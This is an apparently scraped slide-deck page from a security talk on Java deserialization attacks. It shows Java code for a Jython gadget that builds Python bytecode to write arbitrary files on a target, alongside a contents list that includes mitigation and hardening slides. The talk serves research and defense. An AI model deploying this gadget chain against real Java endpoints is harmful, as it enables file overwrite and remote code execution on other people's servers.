Serial Killer Silently Pwning Your Java Endpoints

More documents

Recommendations

Info

New RCE Gadget in Jython (CVE pending) org.python.core.PyFunction <strong>Serial</strong>izable Invoca@onHandler Upon func@on intercep@on custom python bytecode will be called Only python built-in func@ons can be called Impor@ng modules is not possible: no os.system() sorry :( S@ll we can read and write arbitrary files (can cause RCE in web app) In order to invoke the payload a trigger gadget is needed 14
New RCE Gadget in Jython (CVE pending) 1 // Python bytecode to write a file on disk 2 String code = 3 "740000" + // 0 LOAD_GLOBAL 0 (open) 4 "640100" + // 3 LOAD_CONST 1 () 5 "640200" + // 6 LOAD_CONST 2 ('w') 6 "830200" + // 9 CALL_FUNCTION 2 7 "690100" + // 12 LOAD_ATTR 1 (write) 8 "640300" + // 15 LOAD_CONST 3 () 9 "830100" + // 18 CALL_FUNCTION 1 10 "01" + // 21 POP_TOP 11 "640000" + // 22 LOAD_CONST 12 "53"; // 25 RETURN_VALUE 13 14 // Helping cons and names 15 PyObject[] consts = new PyObject[]{new PyString(""), new PyString(path), new PyString("w"), new PyString(content)}; 16 String[] names = new String[]{"open", “write"}; 17 18 PyBytecode codeobj = new PyBytecode(2, 2, 10, 64, "", consts, names, new String[]{}, "noname", "", 0, ""); 19 setFieldValue(codeobj, "co_code", new BigInteger(code, 16).toByteArray()); 20 PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj); 15
Page 1 and 2: Chris;an Schneider Serial Killer: S
Page 3 and 4: Standing on the Shoulder of Giants
Page 5 and 6: AWack Surface Usages of Java serial
Page 7 and 8: Triggering Execu;on via "Magic Meth
Page 9 and 10: Exploi;ng "Magic Methods" But what
Page 11 and 12: Exploi;ng Invoca;onHandler (IH) Gad
Page 13: New RCE Gadget in BeanShell (CVE-20
Page 17 and 18: Exis;ng Mi;ga;on Advice Simply remo
Page 19 and 20: Exis;ng Mi;ga;on Advice Simply remo
Page 21 and 22: How did vendors handle this recentl
Page 23 and 24: Is this for real or is this just fa
Page 25 and 26: Now with home delivery javax.media.
Page 27 and 28: Is it just Java Serializa;on? XStre
Page 29 and 30: XStream, can you run readObject()?
Page 31 and 32: Who Should Check for What? 1. Check
Page 33 and 34: High-Level Gadget Categories Gadget
Page 35 and 36: What to Check During Pentests? DAST
Page 37 and 38: Ac;ve Vulnerability Scanning Some B
Page 39 and 40: How to Harden Your Applica;ons? DO
Page 41: Chris;an Schneider @cschneider4711

Serial Killer Silently Pwning Your Java Endpoints

Create successful ePaper yourself

Delete template?

Save as template?